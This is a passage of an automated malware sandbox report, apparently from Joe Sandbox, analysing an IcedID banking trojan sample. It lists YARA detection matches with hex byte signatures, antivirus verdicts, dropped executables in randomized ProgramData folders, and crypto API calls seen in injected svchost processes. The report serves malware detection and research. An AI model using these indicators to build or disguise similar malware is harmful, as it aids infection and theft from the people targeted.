00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x5dec:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x2556:$major_ver: 0F B6 05 A8 62 89 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 89 02 8D 45 80 FF 35 A4 62 89 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 89 02 83 C4 38 8B E5 5D C3
00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 EC 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 EC 02 8D 45 80 FF 35 A4 62 EC 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 EC 02 83 C4 38 8B E5 5D C3
00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x47b4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0xf1e:$major_ver: 0F B6 05 A8 62 53 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 53 02 8D 45 80 FF 35 A4 62 53 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 53 02 83 C4 38 8B E5 5D C3
00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x51d4:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x193e:$major_ver: 0F B6 05 A8 62 53 02 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 53 02 8D 45 80 FF 35 A4 62 53 02 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 53 02 83 C4 38 8B E5 5D C3
00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x1511d:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x11887:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	IcedID	IcedID Payload	kevoreilly	0xe31:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x7373:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x151d5:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x1193f:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp	IcedID	IcedID Payload	kevoreilly	0x151a5:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3 0x1190f:$major_ver: 0F B6 05 A8 62 00 10 6A 68 6A 72 FF 75 0C 6A 70 50 FF 35 A0 62 00 10 8D 45 80 FF 35 A4 62 00 10 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 7C 71 00 10 83 C4 38 8B E5 5D C3
Click to see the 85 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.tsuvgo.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
6.2.tsuvgo.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
24.3.uvtsuvts.exe.5c6142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
24.3.uvtsuvts.exe.5c6142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
22.3.ziczv.exe.716142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
22.3.ziczv.exe.716142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
20.2.ayxuiczvtsui.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
20.2.ayxuiczvtsui.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
6.3.tsuvgo.exe.636142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
6.3.tsuvgo.exe.636142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
18.3.tfykdkdkdk.exe.546142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
18.3.tfykdkdkdk.exe.546142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
0.3.GziaFibS0d.exe.616142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0.3.GziaFibS0d.exe.616142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
27.2.czipqtsh.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
27.2.czipqtsh.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
20.3.ayxuiczvtsui.exe.616142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
20.3.ayxuiczvtsui.exe.616142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
16.3.zipdk.exe.20b6142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
16.3.zipdk.exe.20b6142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
0.3.GziaFibS0d.exe.616142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0.3.GziaFibS0d.exe.616142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
18.3.tfykdkdkdk.exe.546142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
18.3.tfykdkdkdk.exe.546142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
6.3.tsuvgo.exe.636142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
6.3.tsuvgo.exe.636142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
4.2.rencz.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
4.2.rencz.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
20.3.ayxuiczvtsui.exe.616142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
20.3.ayxuiczvtsui.exe.616142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
27.3.czipqtsh.exe.20b6142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
27.3.czipqtsh.exe.20b6142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
16.2.zipdk.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
16.2.zipdk.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
22.2.ziczv.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
22.2.ziczv.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
27.3.czipqtsh.exe.20b6142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
27.3.czipqtsh.exe.20b6142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
4.3.rencz.exe.716142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
4.3.rencz.exe.716142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
24.2.uvtsuvts.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
24.2.uvtsuvts.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
22.3.ziczv.exe.716142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
22.3.ziczv.exe.716142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
16.3.zipdk.exe.20b6142.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
16.3.zipdk.exe.20b6142.0.unpack	IcedID	IcedID Payload	kevoreilly	0x631:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
4.3.rencz.exe.716142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
4.3.rencz.exe.716142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
24.3.uvtsuvts.exe.5c6142.0.raw.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
24.3.uvtsuvts.exe.5c6142.0.raw.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
0.2.GziaFibS0d.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
0.2.GziaFibS0d.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
18.2.tfykdkdkdk.exe.400000.0.unpack	JoeSecurity_IcedID_3	Yara detected IcedID	Joe Security
18.2.tfykdkdkdk.exe.400000.0.unpack	IcedID	IcedID Payload	kevoreilly	0x1231:$crypt2: 8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3
Click to see the 49 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: GziaFibS0d.exe	ReversingLabs: Detection: 78%
Source: GziaFibS0d.exe	Virustotal: Detection: 81%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: GziaFibS0d.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Avira: detection malicious, Label: HEUR/AGEN.1312689
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Avira: detection malicious, Label: TR/AD.IcedId.htnhd
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Avira: detection malicious, Label: TR/AD.IcedId.htnhd
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Avira: detection malicious, Label: HEUR/AGEN.1312689
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Avira: detection malicious, Label: HEUR/AGEN.1312689
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Avira: detection malicious, Label: TR/AD.IcedId.htnhd
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Avira: detection malicious, Label: HEUR/AGEN.1312689
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Avira: detection malicious, Label: HEUR/AGEN.1312689

Yara detected IcedID

Source: Yara match	File source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: GziaFibS0d.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_02533E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	3_2_02533E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_02532F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_02532F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_02693E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	5_2_02693E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_02692F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	5_2_02692F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	15_2_027E3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E2F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	15_2_027E2F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	17_2_02EC3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC2F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	17_2_02EC2F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC2F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	19_2_02AC2F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	19_2_02AC3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F73E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	21_2_02F73E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F72F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	21_2_02F72F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_02892F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	23_2_02892F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_02893E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	23_2_02893E7E
